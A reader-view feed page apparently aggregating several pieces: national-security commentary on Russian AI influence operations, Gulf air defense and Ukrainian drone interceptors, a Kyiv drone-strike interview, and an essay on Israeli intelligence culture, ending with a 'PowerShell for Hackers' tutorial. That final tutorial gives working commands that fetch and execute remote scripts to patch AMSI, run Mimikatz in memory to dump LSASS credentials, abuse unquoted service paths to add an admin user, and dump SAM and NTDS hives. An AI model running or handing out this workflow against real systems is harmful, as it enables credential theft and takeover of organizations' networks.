Reading view

There are new articles available, click to refresh the page.

Russia’s AI Blueprint Exposes an Authoritarian Playbook

Russia, China, and Iran are all sharing the same playbook for corrupting Western elections. The United States is on track to be the next target this November.

A troveof Russian documents leaked in May outlines Moscow’s plans to use AI to warp foreign decision-making and sway elections. The Kremlin’s “Projects 2026” strategy reveals Russia’s plot to influence upcoming elections in Europe and Israel. Their tactics are similar to those used by China and Iran for years, and what emerges isn’t a Russian innovation — it’s a shared authoritarian playbook.

Projects 2026 calls for the creation of an opinion leader database to monitor the social media profiles of 10,000 influential individuals across Europe, including the 100 most prominent opposition figures in France alone. This is precisely the model Chinese state-aligned company GoLaxy piloted against the United States in 2025. The firm reportedly built constantly evolving psychological profiles of 117 members of Congress and roughly 2,000 additional American opinion leaders.

Researchers at Vanderbilt University warned that GoLaxy appeared prepared to target these individuals with messaging aligned with Beijing’s priorities. By monitoring the social media profiles of Western leaders, China and Russia are able to map the target’s values, beliefs, emotional tendencies, and vulnerabilities, making their influence operations more tailored and impactful.

In addition to using AI to build psychological profiles, the authoritarian playbook calls for countries like Russia and Iran to flood their targets with tailored generative AI content. Projects 2026’s “AI News” initiative calls for producing more than 500 short videos to target French audiences across six social media platforms. This tactic mirrors Iranian information operations during the 2025 and 2026 wars with Israel and the United States, when pro-Iranian networks pushed AI-generated and AI-assisted videos tailored to different audiences across X and TikTok, which racked up millions of views. These countries are running highly productive propaganda engines.

The most durable piece of Projects 2026 isn’t the content at all — it’s the plan to create fictitious think tanks and research institutes that can hand Russian narratives a “legitimate information source,” making them more likely to be cited by real news outlets and large language models. The leak shows this already underway: A site called the “World Center for Strategic Studies,” registered in March 2026, published unsigned analysis aimed at Western think tank audiences, with versions planned in German, French, and Spanish. The fake think tank doesn’t need to fool a discerning reader. It needs to get quoted, indexed permanently, and cited by the next AI model that goes looking for sources on the topic.

Iran ran a cruder version of this same play: Iranian state-sponsored cyber espionage groups have repeatedly impersonated real institutions — such as the Royal United Services Institute, the Aspen Institute, and the Washington Institute — to steal credentials and plant material under a trusted name. Projects 2026 proposes something more sustainable: Don’t just hijack existing credibility but manufacture new institutions and let them accrue it over time.

Projects 2026 also proposes building a real Israel-based research institute staffed by Israeli citizens with genuine academic credentials. This approach is reminiscent of the 2014 “Iran Expert Initiative,” where Iranian Foreign Ministry officials attempted to court and influence Western think tank researchers to promote their perspectives and give them legitimacy. Emails leaked in 2023 showed that Iranian diplomats had worked with Western experts across 10 think tanks to aggressively tout the merits of the 2015 nuclear deal between Tehran and major world powers, formally known as the Joint Comprehensive Plan of Action.

In the age of AI, influencing think tanks is narrative laundering at its most dangerous. Once a fabricated or state-aligned source gets cited by a legitimate outlet or indexed by a search engine, it can become part of the training and retrieval corpus that AI systems draw upon.

While the plays are reusable, the targets are new, and for Russia, the target is European elections.

The leaked documents outline a plan to swing Armenia’s parliamentary vote through a Russian-diaspora outlet and a “Mitteleuropa” initiative aimed at reshaping alignments in Hungary and Slovakia. This is where the surveillance, flooding, and laundering modules converge. To counter it, policy solutions must be swift and targeted.

First, allied governments should require disclosure of foreign funding and foreign state links for any media outlet, think tank, or “research institute” operating ahead of an election in an at-risk state — closing exactly the gap that lets a “World Center for Strategic Studies” pass as domestic and independent. Research by the Foundation for Defense of Democracies (FDD) into Qatari money in American higher education shows what a real transparency regimen requires: disclosures reaching individual researchers, not just institutions; low reporting thresholds with real penalties; registration in the style of the Foreign Agents Registration Act for state-directed “institutes” masquerading as independent organizations; and provisions against the kind of obstruction Qatar used to block Texas A&M’s funding records in court. Russia is proposing to build the same laundering vehicle in Europe that Gulf money has already normalized in American academia. The fix already exists — it just needs to be strengthened.

Second, platforms should both demonetize and remove unlabeled AI-generated political content during designated pre-election windows in at-risk states. X’s own emergency policy during the Iran war, which suspended digital influencers’ ability to monetize their content for 90 days on undisclosed AI-generated war footage, shows platforms already have the infrastructure to act fast when the stakes are high enough. But demonetization alone left the content up and circulating; independent researchers found AI-generated war footage kept flooding feeds regardless of the policy. Elections warrant a harder line: If posts feature undisclosed AI-generated content during an active election period, they shouldn’t just lose ad revenue. They should come down.

Third, Washington should prepare for future attempts at election influence by boosting the protection mechanisms it already has in place. Currently, 31 states have passed election deepfake laws, but they are under legal scrutiny because they touch on domestic speech. Federal action targeting foreign actors rests on firm ground. The 2002 McCain-Feingold Act prevents electioneering communications by foreign actors, but this only applies to broadcast, cable, and satellite communications. It must be updated to explicitly include paid internet and digital advertisements. It should also close the gap on AI-generated political content and require labeling so that foreign deepfakes can’t hide behind current ambiguities.

Projects 2026 is not evidence that Russia has cracked something new. It’s evidence that Moscow, Beijing, and Tehran are now running the same AI playbook against the same democracies, taking turns testing which module works best. The future outlined in Projects 2026 may not be here yet, but objects in the mirror are closer than they appear.

Leah Siskind is director of impact and an AI research fellow for the Center on Cyber and Technology Innovation (CCTI) at the Foundation for Defense of Democracies (FDD). For more analysis from Leah and FDD, please subscribe HERE. Follow FDD on X @FDD and @FDD_CCTI. FDD is a Washington, DC-based, nonpartisan research institute focusing on national security and foreign policy.

The Cipher Brief is committed to publishing a range of perspectives on national security issues submitted by deeply experienced national security professionals. Opinions expressed are those of the author and do not represent the views or opinions of The Cipher Brief.

Have a perspective to share based on your experience in the national security field? Send it to Editor@thecipherbrief.com for publication consideration.

Read more expert-driven national security insights, perspective and analysis in The Cipher Brief

The Gulf Bought Its Air Defense From Kyiv. We Sold Them The Radar.

Chief Warrant Officer 5 (Ret.) Joey Gagnard concluded nearly three decades of service in the U.S. military, retiring from the special operations community in early 2025. He serves as CEO of Atlas Special Projects and Director of Field Operations at Swarmer.

Disclosure: Atlas Special Projects leads investor delegations to Ukraine and maintains working relationships with Ukrainian drone manufacturers, some of which would benefit from the arrangements argued for below. The argument is my own.

Welcome to The Iron Triangle, the Cipher Brief column serving Procurement Officers tasked with buying the future, Investors funding the next generation of defense technology, and the Policy Wonks analyzing its impact on the global order.

Riyadh, spring 2026. Between February 28 and the April 8 ceasefire, Iran put roughly 6,400 missiles and drones into the Gulf states and Jordan, more than eighty percent of everything it fired at anyone. Six countries fought six separate wars against one coordinated adversary, with no shared early warning and interceptor stockpiles that ran thin in days. An Iranian drone struck a tactical operations center in Kuwait and killed six Americans.

Three suppliers answered the same incoming fire. Here is the ledger.

The United States answered with paper. Over $36.6 billion in Foreign Military Sales notifications to the Middle East in a single quarter, headlined by 730 PAC-3 MSE missiles to Saudi Arabia for $9 billion. That is a little over $12 million per round, aimed at a Shahed that costs about as much as a used pickup, on a delivery schedule measured in years.

Ukraine answered with people. Washington asked Kyiv on a Thursday to send interceptor teams to protect American bases in Jordan, and Kyiv said yes the same day. Within weeks about two hundred Ukrainian advisors were on the ground in Saudi Arabia, Qatar, and the UAE with interceptors that Ukraine sells for between $800 and $3,000 and builds at two thousand a day. Days after the Jordan request, the President went on Fox News Radio and said, “We don’t need their help in drone defense. We know more about drones than anybody.”

Turkey answered with a delivery date. Kuwait signed a government-to-government protocol with Aselsan, Havelsan, and Baykar for Hisar and Korkut air defense, and Riyadh, Doha, and Abu Dhabi opened their own talks with Ankara, because Turkey could put hardware on a ramp this decade and the American backlog for Patriot and THAAD runs to several years.

Then, on March 27, Saudi Arabia signed a ten-year defense partnership with Ukraine built around counter-drone technology and co-production facilities on Saudi soil. Qatar signed two days later. The UAS followed in April. Ten years each, minimum.

So the outcome of America’s largest arms-sales quarter in memory is that our closest Gulf partners now buy their sensors from us and their answer to the actual threat from Kyiv and Ankara. We sold them the radar. Somebody else sold them the thing that shoots.

Expensive Confetti

The arithmetic is not subtle, and the Gulf did it faster than we did. Iran can turn out hundreds of Shaheds a week. The U.S. builds roughly six hundred Patriot interceptors a year, for the whole world, with a waiting list. A Patriot battery is a good answer to a question Iran stopped asking in about 2019.

The Ukrainian answer is a different species. The Wild Hornets Sting costs about $2,500, flies at 195 miles an hour, fits in a duffel bag, and has killed nearly 4,000 Russian drones since may 2025. The SkyFall P1-SUN costs about $1,000, flies at 280 miles per hour, and took down 1,500 Shaheds in its first four months. One Ukrainian firm sold a thousand of them for $3.5 million, total, which is less than a third of one PAC-3 round. More than twenty Ukrainian companies now build interceptors and the Octopus alone is licensed to fifteen of them.

None of this makes the Patriot obsolete. Interceptor drones do not touch ballistic missiles ,and the 6,400 included plenty. But the Gulf learned in six weeks what Ukraine learned in three years: you defend against a thousand cheap things with two thousand cheaper things, and you save the twelve-million-dollar round for what it was built to hit.

Built in Munich

Here is the detail that turns the Gulf story into an Iron Triangle story. The Pentagon has bought exactly one interceptor with a Ukrainian combat record. In May, Joint Interagency Task Force 401 gave Perennial Autonomy, Eric Schmidt’s company, a three-year, $500 million ceiling for the Merops interceptor, a fifteen-thousand-dollar fixed-wing that has downed more than 4,000 Russian drones over Ukraine. It is the right buy. It is also built in Germany, through a partnership with Munich’s Twentyfour Industries.

The American flag interceptor, proven in Ukraine, bought by the Pentagon for the homeland, is made in Bavaria. This is not a scandal. It is a symptom. The design talent is in Kyiv, the production tooling is in Europe, and the one thing that has to be in the United States, the contract, is the only part we have managed to put here.

Meanwhile the July agreement that lets Ukraine sell to the Pentagon for the first time since 2022 approves six Ukrainian companies to ship about one hundred drones for testing under Drone DOminance, and contemplates, someday, Ukrainian production on American soil. One hundred drones. Kyiv ships that many to Riyadh before the coffee is brewed.

What an American Flag Would Actually Mean

Not an American airframe. That race is over; twenty Ukrainian firms iterate faster than any American line will for years, and pretending otherwise is how we ended up with a hundred test articles and a factory in Munich. The American contribution is the three things nobody else at the table can bring.

The first is the kill chain. An interceptor without a sensor network is expensive confetti with a propeller. Ukraine’s cheap drones work because they fly under a national acoustic and radar mesh that took three years to build. The Gulf has no such thing; the after-action reports say so. Turkey cannot integrate Korkut with Patriot and THAAD. The United States owns IBCS, the LTAMDS radars Kuwait just bought eight of for $8 billion, and the $4.5 billion discrimination radar the UAE is buying for THAAD. The offer writes itself: your thousand-dollar Ukrainian interceptor gets cued by our eight-billion-dollar sensor layer. That is the flag.

The second is the paper. Licensed co-production under FMS is a forty-year-old tool. Abrams in Egypt. F-16 in Turkey. Patriot itself in Japan. The structure is a trilateral: Ukrainian design and Ukrainian intellectual property, Gulf capital and final assembly to satisfy Vision 2030 localization, American components, integration, and the FMS wrapper that turns a purchase into a security relationship. The UK has already proven the licensing half, building Octopus interceptors in Britain at a thousand a month and sending them back to Ukraine.

The third is reciprocity. Kyiv’s own ask was one sentence: “We can help you fight against Shaheds. Help us fight against ballistic missiles.” Gulf money buys the interceptor line. A slice of the PAC-3 allocation that the Gulf money is already funding flows to Ukraine. Stings for Patriots. Three countries get what they cannot build, and the United States is the reason it happens.

What It Has Not Happened

Every obstacle is one I have written about before, which is the depressing part.

Start with ITAR. The moment a Ukrainian design is produced by an American licensee with American controlled content, it becomes ITAR-controlled, its re-export to Riyadh needs a DDTC license, and Kyiv loses the freedom to sell the same design to Oslo. Ukrainian founders already decline to domicile intellectual property here for exactly this reason. The fix is the one I argued for in July: a trusted-trader tier, or an AUKUS-style exemption scoped to the trilateral, with the IP staying in Kyiv and the United States as licensee rather than owner.

Then the parts bin. A thousand-dollar P1-SUN is a thousand-dollar P1-SUN because of Chinese motors, cells, and cameras. Under an American flag it must clear NDAA Section 848 and, if the Department of War is the buyer of record, the Blue UAS list. The cost of making the interceptor American is not the airframe. It is the audit and the re-sourcing, and nobody in the building has priced how much of the thousand dollars survives that. Turkey does not have this problem. That is the entire reason Turkey is winning the Gulf.

Then tempo. Ukraine signed three Gulf deals in about three weeks. FMS notification to first delivery is measured in Congressional recesses. Either the trilateral runs on Direct Commercial Sales with expedited licensing, or it is a press release.

And then the politics, which I will state once and then be finished. The Commander in Chief said we do not need their help days after his own government asked for it, and the Pentagon spent the spring resisting broader cooperation. The Gulf hosts Russian diplomacy. Kyiv keeps state control over exports, with its own forces first in line. None of these are fatal. All of them are real.

For the Procurement Officer. Your requirement is not an interceptor. It is a kill chain that accepts an interceptor you did not design. Write the sensor and command-and-control interface as the requirement and let the airframe compete, or you will spend the next POM cycle buying an American drone that arrives in 2029.

The Investment Thesis. The value in this market is not in the airframe and it never was. It is in the integration layer, the domestic component that lets a Ukrainian design survive Section 848. And the licensing paper. The company that can take a thousand-dollar Kyiv design and hand the Pentagon an American-compliant unit at two thousand, on a line this side of the Atlantic, is worth more than the company that designs the next one.

The Policy Wonk’s Warning. The security guarantee is being unbundled from the hardware. For seventy years those were the same product. Our partners are learning they can buy the guarantee from us and the shooting from someone else, and the day they discover they can buy the sensors elsewhere too, the guarantee is just a speech.

My Take. I have been in the room in Kyiv when founders explain, patiently, why they will not bring their IP to America. It is not ingratitude. It is that our export regime treats an ally’s design as a hostage the moment it touches our supply chain. We asked those same founders for help defending our bases in Jordan, and they sent people the same day, and then we told the world we did not need them. I have watched a lot of good capability lose to bad processes. I have not often watched it lose to bad manners.

The Risk. A co-production line in the Gulf is a leakage path to whoever the Gulf talks to next, and that list includes Beijing and Moscow, which is precisely why the British license sends its output home to Ukraine rather than into a third market. Iran is already fielding jet-powered Shaheds that outrun a Sting. And anyone who reads this as an argument to cancel the Patriot order has misread it; the 730 rounds to Riyadh are for the thing the drones cannot touch. The argument is not fewer Patriots. It is that a thousand-dollar problem should not be the one part of Gulf air defense that American has nothing to do with.

We spent the spring selling our partners the most sophisticated radar on earth. Kyiv and Ankara sold them what the radar is for. When the next 6.400 comes over the horizon and the Saudi interceptor that meets them has a Ukrainian design, Turkish neighbors, Chinese motors, and an American radar track, whose air defense is that?

The Cipher Brief is committed to publishing a range of perspectives on national security issues submitted by deeply experienced national security professionals. Opinions expressed are those of the author and do not represent the views or opinions of The Cipher Brief.

Have a perspective to share based on your experience in the national security field? Send it to Editor@thecipherbrief.com for publication consideration.

Read more expert-driven national security insights, perspective and analysis in The Cipher Brief

A Former CIA Station Chief on Kyiv Under Drone Siege



Reporting live from Kyiv, Cipher Brief expert and former senior CIA officer Ralph Goff walks CEO and Publisher Suzanne Kelly through a drone strike that hit the SBU headquarters in the heart of the city today.

Ukraine’s SBU — the Security Service of Ukraine (Sluzhba bezpeky Ukrainy) — is best described as Ukraine’s principal domestic security and counterintelligence service, although its wartime role has become substantially broader and more operational.

The closest U.S. analogy would be a combination of responsibilities that are divided between the FBI, the CIA and specialized military/intelligence capabilities, here in the U.S. The SBU is responsible for counterintelligence, counterespionage, counterterrorism, protecting state secrets and investigating threats to Ukrainian national security. Since Russia’s full-scale invasion, it has also become a significant wartime intelligence and covert-action organization.

Kelly talked with Goff about the impact of a Russian drone attack on the organization's headquarters and the surprising resilience of Kyiv residents in the strike's aftermath.

Kelly: You've been on the ground in Kyiv for a couple of days, but there was quite an incident this morning amid near-nonstop air raids that have lasted for more than a week now. Tell us about where you were and what you heard this morning near SBU Headquarters.

Goff: Today in Kyiv we had some air raid alerts overnight, then some in the morning, and a couple more during the day. But today was followed up with a couple of drone strikes right in the middle of Kyiv. Early this afternoon, one struck the headquarters of the Internal Security Service, the SBU, which seems like a very deliberate, targeted attack by the Russians. Unfortunately, there were some casualties, I don't think anyone was killed, but there were wounded, and some damage to the building. It was a very clear sign from the Russians that their jet-powered Geran drones are not only hard to intercept, but very accurate.

Kelly: The Cipher Brief has been in that area of Kyiv with you several times in the past, Ralph. That's essentially the inner circle, where the government operates. We've been wondering how long it would be before some of these significant targets got hit, given Ukraine's shortage of anti-missile systems. What's it been like on the ground since you arrived three or four days ago? Is there a heightened sense of anxiety?

Goff: There is, among parts of the population, but I'd say for most people it's more a heightened sense of annoyance. Here we had a drone strike right in the heart of Kyiv, at the SBU building, and most people's biggest concern afterward was how it messed up traffic downtown, it's a major artery, so there were traffic jams all around. History is replete with examples where so-called strategic bombing of civilian targets or major cities to break the will of an enemy has never worked, and I don't see that working here either.

I do think it's a clear sign that Ukraine has to find a way to close the gap and counter these new high-speed, high-performance drones. We hear reports of an 85 to 90 percent interception rate on conventional, piston-engine drones, the regular Shahed-type drones. But with the jet-powered drones, we've heard the interception rate drops to much lower figures, which I won't get into because I don't want to give the enemy that kind of data. And when it comes to missiles, the press has already reported that the Ukrainians are so low on counter-missile capabilities that they rarely intercept any ballistic missiles launched into Ukraine.

Kelly: When you're watching this war from afar, it's hard to get a clear sense of how much time is left before Kyiv, Lviv, and other major cities are in real trouble. Kyiv has always had the strongest air defenses. Is Kyiv running out of time?

Goff: I don't think they're running out of time so much as, I think they will close the gap, they will solve the technical issues and improve their defenses, but it will take time, and they'll suffer in the meantime. I'll say it's going to be a bad winter; I'm fairly certain of that. But the Russians didn't break the Ukrainian spirit last winter, and they won't break it this year either.

On the other hand, there's an interesting dichotomy of feelings and morale. At the front, I was talking to a friend who's been deeply involved in providing intelligence assistance to frontline units, a non-governmental source, and he said that for the first time since he's been here, every unit he visited had high morale. We're looking at a battlefield now where the casualty ratio is probably eight to one in favor of the Ukrainians. Eight to one, that's an astounding number. So you have this high morale at the front, where soldiers are saying, “we think we can pull this off.” And then in the cities, you have people increasingly concerned about the welfare of their families and children because of these blatantly terroristic attacks on civilian targets. There's a real dichotomy emerging in the middle of this war.

Kelly: On that eight-to-one figure, is that because so much of the fighting on the front lines now is essentially robot-on-robot, drone-on-drone combat? Or is something else driving that number?

Goff: That's a large part of it, but at the end of the day you still need soldiers fighting soldiers. What it comes down to is who has better mastery of the battlefield, and the Ukrainians have information dominance. On top of that, they're the defenders, they can dig in and weather the storm, whereas the Russians are still relying on high-cost, high-attrition tactics, sending soldiers out literally in ones and twos to try to infiltrate Ukrainian positions. But they're very vulnerable, because the battlefield has become so saturated with drone coverage and surveillance, what we call ISR, intelligence, surveillance and reconnaissance. The Ukrainians have really mastered that, and it's given them a huge advantage. That could change, the Russians aren't sitting back, they're innovating too, but for now the Ukrainians have an edge, and they're going to keep innovating to maintain it.

Kelly: There have been a lot of headlines about domestic issues that President Zelensky is dealing with this week in Kyiv, even as he wages this war, including the departure of Minister Fedorov, who's been pushing forward on defense technology and made some announcements this week here in the U.S. about that. What's different now in terms of the strength, stability, and unity of the government? We know the unity of the people is hard to break, but how are you looking at this through the government lens?

Goff: The big difference now is that the innovation and technical advances made by the Ukrainians don't depend on one person. This isn't some technological breakthrough that depends on one minister or one ministry, it's government-wide, across the various ministries and different commands. It's a multi-echelon effort where technological innovation isn't just pushed down to the lowest levels, it's driven by the lowest levels. It runs from top to bottom and bottom to top. So whether you change a minister or change a commander, like the change from Syrskyi to Drapatyi, that doesn't change. The innovation has reached all levels, and it's here to stay.

Kelly: I'm jealous The Cipher Brief isn't there with you right now, we usually are, and we like being there because you're attending a number of interesting and enlightening meetings while in Kyiv. Has anything surprised you this time, or really stuck with you, from this round of meetings?

Goff: Nothing ever really surprises me here. I think one of the reasons I come is for my own benefit, I always leave more inspired than when I arrived. A good example: we had this horrendous drone strike in the middle of the city, and within minutes people were just going about their daily lives. The emergency response was there, I watched ambulances flowing to the scene, first responders arriving. I actually marveled at that, because my initial instinct was to stay away, given the Russian penchant for the “double tap”, hit the target, wait a few minutes until first responders arrive, then hit it again. Even knowing that's a Russian tactic, the first responders were there within minutes.

As I continued on to my next meeting, people were going about their lives, doing their shopping, going to work, going to the grocery store. They weren't deterred by the event. And while that doesn't surprise me, it does inspire me.

Kelly: What about the significance of the SBU? A lot of people may not understand exactly what it does, it's similar to our own intelligence gathering but with other functions too, almost a combination of the CIA and FBI if we're relating it to the U.S. Tell us about some of its operations and why it's an important organization in Ukraine.

Goff: It's an important organization because, yes, they have the primary mandate for internal security in Ukraine, but they're also involved in long-range strikes into Russia. If you see press reporting on some sort of assassination attempt, like the Russian air force general who was shot the other day, that's pretty much the SBU, showing they have a long reach into Russia. So they're playing on multiple levels, and they're an important player. This is a sign that Russia knows who they are and where they are.

But taking out the SBU headquarters is probably inconvenient for some time, and there will be losses. The Ukrainians have decentralized much the same way they've decentralized the structure of their military intelligence community, they've decentralized command and control. So if you take out the SBU headquarters, I'm sure within minutes there's a backup headquarters and contingency plans in place. The Ukrainians are well aware of Russia's capability to strike their headquarters.

Kelly: It's been a little while since you were working as a CIA station chief, you held six different postings in that role. If you were filing something back to the United States today, what's the most important thing you'd want people to understand about what you're seeing there?

Goff: That the war is entering a different phase. And if the war is entering a different phase, it means the Ukrainians are going to have to react differently, which means their allies are going to have to react differently, which means those of us in the intelligence community are also going to have to change our game and adjust. We're going to have to be prepared to support the Ukrainian effort to defend themselves, and if that means an active defense against the Russians, that would be my recommendation.


The Cipher Brief is committed to publishing a range of perspectives on national security issues submitted by deeply experienced national security professionals. Opinions expressed are those of the author and do not represent the views or opinions of The Cipher Brief.

Have a perspective to share based on your experience in the national security field? Send it to Editor@thecipherbrief.com for publication consideration.

Read more expert-driven national security insights, perspective and analysis in The Cipher Brief

The Cultural Roots of Strategic Surprise and Resilience: the Israeli case of October 2023

October 7th, 2023, 06:29 AM. Probably the most tragic day in Israel’s history. A surprise attack conducted by Hamas from the Gaza Strip caught Israel completely off guard. Hamas terrorists infiltrated Israel, killing more than 1200 Israelis and abducting more than 250 individuals into the Gaza Strip. They exercised mass murder and rape, effectively conquering parts of Israel’s Western Negev for several hours. This was a colossal military and intelligence failure, more dramatic than that of the Yom Kippur War in 1973. It was also, of course, a policy failure. The core foundations of Israel’s security doctrine – defense, early warning, and deterrence – completely shattered.

How could this happen to the Israeli Defense Forces (IDF), one of the best militaries in the world, and to one of the best intelligence communities in the world? For me, as a brigadier general in the Israeli Defense Intelligence (IDI) reserves with decades of practical experience, and as a scholar of Israeli strategic culture and intelligence culture, this was a puzzle. Almost inconceivable. I was surprised by the magnitude of Israel’s surprise. How could Israel’s security establishments reach October 7th with their “eyes wide shut” about Hamas intentions and capabilities?

But as the regional war which followed October 2023 commenced, I recognized another interesting puzzle. Israeli security establishments have, writ large, recovered from the failure of October 2023, with Israel fighting for almost three years in several fronts, from the Gaza Strip to Iran. Although not gaining “total victory”, these establishments reached impressive operational achievements. They dismantled most of Hamas’ military and civilian infrastructure in the Gaza Strip and eliminated most of Hamas leadership in the Middle East; dismantled most of Hizballah assets in Lebanon, while also eliminating Hizballah leader Nasrallah, and demoralizing Hizballah in the famous pagers operation; destroyed many of the Houthi assets in Yemen; and in June 2025 and March 2026, conducted unprecedented attacks in Iran, including the elimination of Iran’s Supreme Leader and most of Iran’s military leadership, and degrading Iran’s nuclear and military capabilities.

How could the same establishments, which colossally failed to prevent the Hamas attack in October 2023, reach such achievements during 2024 and 2025? How could an intelligence system completely surprised by Hamas allow Israel to completely surprise Iran, the regional super-power? How could Israel “turn the tides” of the war after October 2023, and then, like the Phoenix from Greek mythology, “rise from the ashes” and conduct phenomenal strikes in Iran?

These are the topics I discuss in my new book, which reveals the cultural roots of Israel’s strategic surprise in October 2023, and of Israeli resilience following October 2023. The book knowingly focuses on Israel’s security establishments, and not on Israeli policy makers. Its scope is limited, and its conclusions will naturally be debated.

I open the book by acknowledging that some of my previous insights, which characterized Israeli intelligence culture prior to October 2023, were wrong. For instance, I assessed that this culture relies on professional norms and values of critical thinking, a sense of individual responsibility, and moral courage in the face of hierarchy. October 7th, unfortunately, showed that some of these remained aspirational norms rather than realized behavior in Israel’s security establishments.

Several typical facets of Israeli strategic and intelligence cultures account for both failure and success. For instance, the Israeli typical focus on operational, tactical, and targeting intelligence prior to October 7th resulted in an under-appreciation for strategic analysis, military analysis, and strategic early warning from war. The low quality of these disciplines was one of the factors for the October 7th failure. But the inclination towards targeting intelligence, and the close integration of intelligence into decision-making and operations, also enabled Israel to conduct ground-breaking overt and covert operations across the Middle East, relying on high-resolution and real-time targeting intelligence. Many more examples are discussed in the book.

However, the book stresses that strategic culture and intelligence culture are not unitary in essence, nor are they fixed in time. Changes in these cultures can be caused by trauma, or by competition for dominance between sub-cultures. For instance, in the years prior to October 7th, hubris evolved in Israeli security establishments, which not just underestimated Hamas, but also overestimated their own military and intelligence capabilities. October 7th, naturally, created a post-traumatic effect. Israeli deterrence-oriented security doctrine, which was dominant prior to October 7th, became heavily oriented towards prevention after October 7th, not just regarding adversary nuclear projects. This “move between extremes”, or “over-adaptation”, is for itself typical of Israeli strategic culture.

In conclusion, the book applies the frameworks of strategic culture and intelligence culture to a real-world case of security performance. This perspective does not only apply to Israel. In the US, for instance, it can allow critical introspection of the recent conflict with Iran, including the repeated experienced surprise the US seems to be experiencing. Furthermore, understanding partners’ and allies’ cultures, and not just adversary ones, is an imperative. Especially for American scholars and practitioners. The book makes an important contribution to this perspective. At the end of the day, national security is all about people. Society and culture play a major role.

The Cipher Brief is committed to publishing a range of perspectives on national security issues submitted by deeply experienced national security professionals. Opinions expressed are those of the author and do not represent the views or opinions of The Cipher Brief.

Have a perspective to share based on your experience in the national security field? Send it to Editor@thecipherbrief.com for publication consideration.

Read more expert-driven national security insights, perspective and analysis in The Cipher Brief

PowerShell for Hackers, Part 8: Privilege Escalation and Organization Takeover

Welcome back, pentesters!

For quite a while we’ve been covering different ways PowerShell can be used by hackers. You’ve learned about persistence, evasion, survival and the mayhem you can cause with PowerShell.

Today we’ll show you a basic workflow for interacting with a Windows system once you’ve gained some access. You’ll see privilege escalation, AMSI bypass and dumping credentials from a host. PowerShell can be used to exploit systems, even though it was never built for that purpose. Our goal is to make it simple for you to automate exploitation during pentests. Things that usually get done manually can be automated with the scripts. Let’s start by learning about AMSI.

AMSI Bypass

AMSI is the Antimalware Scan Interface. It’s a Windows feature that sits between script engines like PowerShell or Office macros and whatever AV/EDR product is installed on the machine. When you execute something, the runtime hands that content to AMSI so the security product can scan it before anything dangerous runs. It makes scripts and memory activity visible to security tools, which raises the bar for simple script attacks and malware. Hackers are constantly looking for ways to keep that content from ever reaching AMSI  or to alter it so it won’t match detection rules.

You’ll see plenty of articles and tools claiming to bypass AMSI, but soon after they get released, Microsoft patches the vulnerability. That doesn’t mean these bypasses don’t exist. They certainly do and hackers use them, so it’s worth being familiar with this attack. Let’s test our system and try to patch AMSI.

First we need to check if the Defender is running on our target:

PS > Get-WmiObject -Class Win32_Service -Filter “Name=’WinDefend’”
checking if the defender is running on windows

And it is. If it was off, we wouldn’t need any AMSI bypass.

Patching AMSI

We need to patch AMSI using our script. Let’s download it:

PS > wget   https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/shantanukhande-amsi.ps1 -O shantanukhande-amsi.ps1

As you know by now, there are a few ways to execute scripts in PowerShell. We will use a simple one for demonstration purposes:

PS > .\shantanukhande-amsi.ps1
patching amsi with a powershell script

If your output matches ours, then AMSI has been successfully patched. From now on, Defender doesn’t have access to your PowerShell sessions and anything can be executed in it. 

It’s important to mention that some articles on AMSI bypass will tell you that downgrading to PowerShell Version 2 helps to evade detection, but that is not true. At least not anymore. Defender actively monitors all of your sessions and these simple tricks will not work.

Dumping Credentials with Mimikatz

Since you can run whatever you want now, let’s use Mimikatz to grab credentials. We’ll run it in memory without ever letting it touch disk. The command below can be paired with the AMSI script to keep it off the disk entirely.

Note that we are using Invoke-Mimikatz.ps1 by g4uss47 and it is the updated PowerShell version of Mimikatz that actually works. For OPSEC reasons we don’t recommend running Mimikatz commands that touch other hosts because network security products might pick this up. Instead, let’s dump LSASS locally and see what’s there in the results:

PS > iwr http://raw.githubusercontent.com/g4uss47/Invoke-Mimikatz/refs/heads/master/Invoke-Mimikatz.ps1 | iex  

PS > Invoke-Mimikatz -DumpCreds
dumping lsass with mimikatz powershell script Invoke-Mimikatz.ps1

Now we have the credentials of a brand manager. If we compromised a more valuable system in the domain, like a server or a database, we could expect domain admin credentials. You’ll see this quite often.

Privilege Escalation with PowerUp

Privilege escalation is a complex topic. Sometimes systems are misconfigured and regular users end up with admin privileges on them, so you won’t need to bother much here. That can let you skip privilege escalation entirely and jump straight to lateral movement, since the compromised user already has high privileges. There are multiple vectors for privilege escalation, but among the most common are unquoted service paths and insecure file permissions. Insecure file permissions can be abused easily by just swapping in a malicious file with the same name as the legitimate one, but unquoted service paths take more work for a beginner. That’s why we’ll cover this attack today with the help of PowerUp. Before we get into it, it’s worth mentioning that this script has been known to security products for a long time, so be careful.

Finding Vulnerable Services

Unquoted Service Path is a configuration mistake in Windows services, where the full path to the service executable has spaces in it but isn’t wrapped in quotation marks. Since Windows treats spaces as separators when resolving file paths, an unquoted path like C:\Program Files\My Service\service.exe can get interpreted ambiguously. The system might search for an executable at C:\Program.exe or C:\Program Files\My.exe before it ever reaches the intended service.exe. A hacker can drop their own executable at one of those earlier locations and the system will run that instead of the real service binary. This works as a privilege escalation method because services typically run with higher privileges.

Let’s run PowerUp and find vulnerable services:

PS > iwr https://raw.githubcontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Privesc/PowerUp.ps1 | iex  

PS > Get-UnquotedService  
listing vulnerable unquoted services to privilege escalation

Now let’s test the service names and see which one will get us local admin privileges:

PS > Invoke-ServiceAbuse -Name 'Service Name'

If successful, you should see the name of the service abused and the command it executed. By default, the script will create and add user john to the local admin group. You can edit it to fit your needs.

PS > net user john
abusing an unqouted service with the help of PowerUp.ps1

Now we have an admin user on this machine, which can be used for various purposes.

Attacking NTDS and SAM

With enough privileges, we can dump NTDS and SAM without having to deal with security products at all, just using native Windows functions. These attacks usually take multiple commands, since dumping only NTDS or only a SAM hive doesn’t get you anywhere on its own. That’s why we added a new script to our repository. It automatically identifies what kind of host you’re running it on and dumps the files you need. NTDS only exists on Domain Controllers and holds the credentials of every Active Directory user, so you won’t find this file on regular machines. Regular machines get exploited instead by dumping their SAM and SYSTEM hives. Below you can see how it works.

Attacking SAM on Domain Machines

To avoid issues, bypass the execution policy:

PS > powershell -ep bypass

Then we execute the script to dump SAM and SYSTEM hives:

PS > wget https://github.com/soupbone89/Scripts/tree/main/NTDS-SAM%20Dumper -O ntds.ps1

PS > .\ntds.ps1

# or in memory only
PS > iwr https://github.com/soupbone89/Scripts/tree/main/NTDS-SAM%20Dumper | iex
dumping sam and system hives with ntds.ps1

